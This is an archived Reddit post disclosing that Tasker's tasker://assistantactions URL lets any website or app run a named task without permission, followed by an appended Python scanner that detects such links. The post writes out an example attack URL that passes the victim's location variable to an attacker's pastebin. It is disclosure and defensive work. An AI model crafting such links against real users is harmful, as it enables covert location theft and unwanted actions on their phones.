This is an automated archive made by the Lemmit Bot.

The original was posted on /r/tasker by /u/mylastacntwascursed on 2024-09-16 18:51:41+00:00.


To launch a task through the command system, a third party app needs to declare and manually be granted the net.dinglisch.android.tasker.PERMISSION_SEND_COMMAND permission. Yet any app or website can run any task by launching tasker://assistantactions?task=TASKNAME.

E.g. if I put Tasker tips & tricks in a web page and you have a task named reboot, your phone might just reboot when you tap that link. You would not be amused.

Parameters can also be passed, possibly turning a benign task previously shared on Reddit, XDA or totallylegitwebsite.com/taskertips into a malicious one.

Example: attacker shares a task to easily share selected text to a user-configurable Pastebin account, then crafts the malicious URL tasker://assistantactions?task=known_task_name&par1=%LOCN&par2=URL_to_attackers_pastebin to get the victim's precise location.

This is bad. It can be abused in numerous ways. The tasker://assistantactions URL should only be able to run tasks that the user has explicitly allowed to be launched in this way. u/joaomgcd, are you aware, and what is your opinion on this? Am I missing something? Can I turn this off? And what else does assistantactions do without user confirmation?
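A defensive check built on the URL format described in this post, added here as an example that is not part of the original post and is not Tasker's code: it scans page or message content for `tasker://assistantactions` links and flags parameters that carry a Tasker variable reference or a URL. The variable pattern is a heuristic assumption, the parameter names follow the post's `par1`/`par2`, and the sample page and `paste.example` host are constructed.

```python
import re
from urllib.parse import unquote

# Any tasker://assistantactions link found in HTML or plain text.
LINK_RE = re.compile(r"tasker://assistantactions\?[^\s\"'<>]+", re.IGNORECASE)
# Heuristic (assumption): a Tasker variable looks like % + letter + 2 or more name chars.
VAR_RE = re.compile(r"%[A-Za-z][A-Za-z0-9_]{2,}")
URL_RE = re.compile(r"https?://", re.IGNORECASE)

def find_tasker_links(page_text):
    """Return one finding per assistantactions link, with flags for risky parameters."""
    findings = []
    for match in LINK_RE.finditer(page_text):
        link = match.group(0).replace("&amp;", "&")  # href values are HTML-escaped
        query = link.split("?", 1)[1]
        task, flags = None, []
        for pair in query.split("&"):
            key, _, raw = pair.partition("=")
            value = unquote(raw)
            if key == "task":
                task = value
                continue
            # Check the raw form too: unquote() would mangle %BATT (%BA is valid hex).
            if VAR_RE.search(raw) or VAR_RE.search(value):
                flags.append(f"{key}: Tasker variable reference")
            if URL_RE.search(value):
                flags.append(f"{key}: URL passed as parameter")
        findings.append({"link": link, "task": task, "flags": flags})
    return findings

# Constructed sample page; paste.example is a placeholder host.
SAMPLE_PAGE = """
<a href="tasker://assistantactions?task=reboot">Tasker tips</a>
<a href="tasker://assistantactions?task=known_task_name&amp;par1=%LOCN&amp;par2=https://paste.example/abc">share</a>
<a href="https://example.com/guide">guide</a>
"""

if __name__ == "__main__":
    for f in find_tasker_links(SAMPLE_PAGE):
        print(f["task"], f["flags"] or "no risky parameters, but still runs a task")
```

Every link the function returns is worth reviewing, since each one names a task to run; the flags only mark the links that also pass device data or a destination into that task.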